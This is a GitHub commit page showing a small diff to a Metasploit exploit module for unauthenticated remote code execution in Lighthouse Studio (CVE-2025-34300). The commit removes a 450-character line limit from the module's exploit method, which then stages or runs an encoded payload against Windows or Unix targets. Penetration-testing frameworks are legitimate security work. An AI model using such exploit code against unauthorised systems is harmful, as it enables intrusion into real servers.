Skip to content

Commit 45a6176

Browse files
committed
Removed Limits
1 parent 6bf385e commit 45a6176

File tree

1 file changed

+2
-3
lines changed

1 file changed

+2
-3
lines changed

modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb

Lines changed: 2 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -166,12 +166,11 @@ def execute_command(cmd, _opts = {})
166166
def exploit
167167
print_status('Uploading malicious payload...')
168168

169-
@linemax = 450
170169
case target['Type']
171170
when :windows_dropper, :nix_dropper
172-
execute_cmdstager(linemax: @linemax)
171+
execute_cmdstager
173172
when :windows_command, :nix_command
174-
execute_command(payload.encoded, linemax: @linemax)
173+
execute_command(payload.encoded)
175174
end
176175
end
177176
end

0 commit comments

Comments
 (0)